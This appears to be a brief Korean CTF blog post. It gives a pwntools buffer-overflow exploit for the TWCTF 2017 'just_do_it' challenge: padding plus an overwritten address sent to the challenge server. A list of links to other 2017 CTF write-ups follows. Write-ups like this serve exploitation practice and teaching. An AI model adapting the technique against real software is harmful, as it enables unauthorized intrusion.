단순한 bof문제
1 2 3 4 5 6 7 8 9 10 11 12 | # !/usr/bin/env python # powerprove from pwn import * if __name__ == "__main__": #s = process("./just_do_it") s = remote("pwn1.chal.ctf.westerns.tokyo",12482) payload = "A"*0x14 payload += p32(0x804A080) s.sendline(payload) s.interactive() | cs |
'CTF > 2017' 카테고리의 다른 글
twctf simple_note write up (0) | 2017.09.08 |
---|---|
meepwn CTF 2017 - oldschool (0) | 2017.07.23 |
MeePwn ctf bs (0) | 2017.07.21 |
[0CTF EasiestPrintf] write up (0) | 2017.06.30 |
[plaid ctf 2017] bigpicture (0) | 2017.06.29 |